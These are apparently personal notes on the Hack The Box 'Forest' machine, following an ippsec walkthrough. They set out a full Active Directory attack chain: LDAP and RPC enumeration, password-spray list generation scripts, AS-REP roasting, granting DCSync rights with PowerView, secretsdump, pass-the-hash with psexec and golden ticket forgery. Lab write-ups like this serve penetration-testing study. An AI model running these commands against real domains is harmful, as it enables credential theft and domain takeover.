Forest HTB (ippsec) - follow-through notes
try to enumerate SMB (shares, null session)
try to enumerate host names with nslookup: point nslookup at the target DNS server (server IP), then reverse-resolve
127.0.0.1
the target's actual IP
ldapsearch -h IP -x -s base namingcontexts (find the domain's naming contexts, i.e. the base DN)
ldapsearch -h IP -x -b "DC=htb,DC=local" '(objectClass=Person)' ATTRIBUTES (the attributes you want returned)
for the attribute list you can put whatever you want to see, e.g. sAMAccountName
'(objectClass=user)' works instead of Person, too
once we have the account names we can password spray.
grep sAMAccountName | awk '{print $2}' keeps just the second field (the account name).
make a user list with the valid users: drop the names ending in $ (those are machine/computer accounts, not people) and built-ins like Guest; real user names are generally short
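The user-list step above, as an added example that is not part of the original notes or ippsec's video: a small filter that turns ldapsearch output into a spray list. SAMPLE_LDIF is constructed sample output (the attribute names are what ldapsearch prints; the account names alice, bob and DC01$ are made up, svc-alfresco is the one the notes mention).

```shell
#!/usr/bin/env bash
# Added example (not from these notes or the ippsec video): turn ldapsearch
# output into a user list for spraying. SAMPLE_LDIF is CONSTRUCTED sample
# output; only svc-alfresco is a name the notes actually mention.
SAMPLE_LDIF='dn: CN=Alice Example,OU=Employees,DC=htb,DC=local
sAMAccountName: alice
userAccountControl: 512

dn: CN=Bob Example,OU=Employees,DC=htb,DC=local
sAMAccountName: bob

dn: CN=DC01,OU=Domain Controllers,DC=htb,DC=local
sAMAccountName: DC01$

dn: CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
sAMAccountName: svc-alfresco

dn: CN=Guest,CN=Users,DC=htb,DC=local
sAMAccountName: Guest

dn: CN=krbtgt,CN=Users,DC=htb,DC=local
sAMAccountName: krbtgt

dn: CN=Alice Example,OU=Employees,DC=htb,DC=local
sAMAccountName: alice'

# extract_users: LDIF on stdin, one spray-worthy account per line on stdout.
# Keeps the second field of "sAMAccountName: value" lines (the awk '{print $2}'
# trick from the notes), drops names ending in $ (computer accounts), drops
# Guest and krbtgt (never worth spraying), and dedupes. Values ldapsearch had
# to base64-encode come out as "sAMAccountName:: ..." and are deliberately
# skipped here rather than decoded.
extract_users() {
  awk '$1 == "sAMAccountName:" { print $2 }' \
    | grep -v '\$$' \
    | grep -v -i -x -E 'guest|krbtgt' \
    | sort -u
}

# Real usage:
#   ldapsearch -h IP -x -b "DC=htb,DC=local" '(objectClass=user)' sAMAccountName | extract_users > users.txt
printf '%s\n' "$SAMPLE_LDIF" | extract_users
```

The duplicate alice entry and the DC01$ machine account are there on purpose: the first shows why `sort -u` matters (ldapsearch can return the same object twice when you query broad filters), the second is the class of entry that wastes lockout attempts if left in.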
Let's spray them with a password list!
the password list should be short: every guess burns one lockout attempt per user.
Months, Spring, Summer, Winter, Autumn, Fall, Password, Password123, P@ssw0rd, Secret
for i in $(cat pwlist.txt); do echo $i; echo ${i}2019; echo ${i}2020; done
this adds a year at the end of each word.
hashcat --force --stdout pwlist.txt -r /usr/share/hashcat/rules/best64.rule
This mutates the words with the rule file and prints the result as a new password list (--stdout: nothing is cracked, hashcat is only used as a word mangler)
add a ! at the end of each word:
for i in $(cat pwlist.txt); do echo $i; echo ${i}\!; done
Another technique:
hashcat --force --stdout pwlist.txt -r /usr/share/hashcat/rules/best64.rule -r /usr/share/hashcat/rules/toggles1.rule | sort -u
toggles1.rule capitalizes different letters; repeated -r stacks rules. Then drop anything the password policy would reject anyway, e.g. | awk 'length($0) > 8' keeps only candidates longer than 8 characters
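The mutation steps above (year suffix, trailing !, case toggling, length filter), as an added example written for these notes rather than taken from them or from ippsec: a pure-shell version that runs without hashcat. The functions, the 7-character minimum and the years are assumptions for illustration; the seed words are the ones listed above.

```shell
#!/usr/bin/env bash
# Added example, not from the notes or ippsec: shell-only stand-in for the
# for-loops and hashcat --stdout rule passes above. Nothing touches a target.

# mutate_words: base words on stdin, years to append as arguments.
# For each word emits the word itself, word!, an all-lower and an all-upper
# variant (a crude stand-in for the case-toggling rules), and word+year /
# word+year! for every year given. Output is deduplicated.
mutate_words() {
  local w y lower upper
  while IFS= read -r w; do
    [ -z "$w" ] && continue
    lower=$(printf '%s' "$w" | tr 'A-Z' 'a-z')
    upper=$(printf '%s' "$w" | tr 'a-z' 'A-Z')
    printf '%s\n' "$w" "${w}!" "$lower" "$upper"
    for y in "$@"; do
      printf '%s\n' "${w}${y}" "${w}${y}!"
    done
  done | sort -u
}

# min_length_filter MIN: drop candidates the domain password policy would
# reject anyway (shorter than MIN) so they do not burn lockout attempts.
# Use the minimum length reported by crackmapexec --pass-pol.
min_length_filter() {
  awk -v n="$1" 'length($0) >= n'
}

# build_pwlist MIN YEAR...: the seed words from the notes, mutated and filtered.
build_pwlist() {
  local min="$1"; shift
  printf '%s\n' Spring Summer Winter Autumn Fall Password Password123 'P@ssw0rd' Secret \
    | mutate_words "$@" | min_length_filter "$min"
}

# Example run (assumed policy: 7-character minimum), redirect to pwlist.txt to spray.
build_pwlist 7 2019 2020
```

Count the output before spraying: with a lockout threshold of, say, 5 you can only afford a handful of guesses per user per observation window, so trim the list by hand rather than spraying everything the mutator produces.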
Dump the password policy (lockout threshold, minimum length) before spraying
crackmapexec smb IP --pass-pol
crackmapexec smb IP --pass-pol -u '' -p '' (null authentication attempt)
enum4linux IP also dumps it
Manual way to look up the password policy
if the enumeration output shows something like below, it's going over RPC
do rpcclient -U '' IP
and once logged in:
enumdomains
enumdomusers (lists users with their RIDs)
queryusergroups 0x47b (the user's RID) lists the groups the user is in
querygroup GROUPRID shows which group that RID is (name, description)
queryuser RID shows the user's details (password last set, bad password count, logon times); getdompwinfo dumps the domain password policy itself
Spray the passwords
crackmapexec smb IP -u userlist.out -p pwlist.out (tries every password against every user and stops at the first valid pair; keep the list well under the lockout threshold)
----
Impacket: GetNPUsers.py -dc-ip IP -request 'htb.local/' -format hashcat
looks for accounts that don't require Kerberos pre-authentication (AS-REP roasting) and dumps their AS-REP hashes.
then crack the output (hashcat mode 18200 for the hashcat format)
-----
crackmapexec smb IP -u svc-alfresco -p s3rvice --shares
lists the shares that account can reach and its access level
---
Use evil-winrm
./evil-winrm.rb -u user -p pass -i IP
---> this should get you a shell as the service account
---
Priv Esc
BloodHound
On Kali:
download the zip file and the BloodHound application file separately.
After downloading, unzip the application file.
Install neo4j
neo4j console -> set a new password (default login is neo4j:neo4j) by visiting http://localhost:7474
Now run BloodHound with ./BloodHound --no-sandbox and log in with the neo4j credentials
On the victim's machine, upload SharpHound.exe (or run it from a mounted drive):
.\SharpHound.exe -c all
On Kali,
drop the zip SharpHound produced onto the BloodHound window, which starts ingesting it
In the search bar, type the user you already have and mark it as Owned
-> Show paths from owned principals -> draws the attack graph
If the owned user is in the Account Operators group, it can create domain users and add them to most groups
On the victim:
net user gori gorigori /add /domain (user gori, password gorigori)
this should create an account.
net group "Exchange Windows Permissions" gori /add /domain
net group "Exchange Windows Permissions" /domain will confirm the user has been added.
In BloodHound, click the WriteDacl edge > Abuse Info; it gives the PowerView template:
Add-DomainObjectAcl -Credential $cred -TargetIdentity testlab.local -Rights DCSync
This is a PowerView command.
Download the dev branch of PowerSploit (git clone -b dev https://github.com/PowerShellMafia/PowerSploit); Add-DomainObjectAcl only exists there.
copy PowerView.ps1 over to the victim's machine and dot-source it (. .\PowerView.ps1).
$pass = ConvertTo-SecureString 'gorigori' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('htb\gori', $pass)
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity gori -Rights DCSync
(the -Credential is needed: gori's new group membership is only in a fresh logon token, not in the current shell's)
Then on Kali,
use impacket's secretsdump.py htb/gori:gorigori@IP (DCSync replicates every hash in the domain)
grab the last :HASH: field (the NT hash) of the Administrator line
Pass the hash; no cracking needed
crackmapexec smb IP -u administrator -H HASH
psexec.py -hashes :HASH htb.local/Administrator@10.129.138.20 (or psexec.py htb.local/Administrator:Pass@10.129.138.20 if you cracked it)
This should get you a SYSTEM (root) shell.
---
Another way: crack the NTLM hash
NTLM password cracking with hashcat (mode 1000):
hashcat -m 1000 --username hashes.txt wordlist.txt
--username tells hashcat the lines are in "user:hash" format (the secretsdump lines can go in as-is)
--show prints the cracked users with their passwords afterwards
----
Golden Ticket method
copy the krbtgt NT hash from the secretsdump output.
On the victim's machine, get the domain SID (whoami /user prints the user's SID; the domain SID is that SID without the trailing RID); impacket's ticketer.py takes it as -domain-sid:
ticketer.py -nthash KRBTGT_HASH -domain-sid SID -domain htb.local anyuser
#username can be anything: the ticket is forged, not looked up.
export KRB5CCNAME=anyuser.ccache, then psexec.py htb.local/anyuser@DCHOSTNAME -k -no-pass
an IP address must not be used for the remote hostname (Kerberos matches the ticket against the host's SPN). Always add the host name to /etc/hosts.
if it says the time is wrong (KRB_AP_ERR_SKEW), we have to change our clock; nmap shows the clock-skew in its output.
date -s TIME
to change the time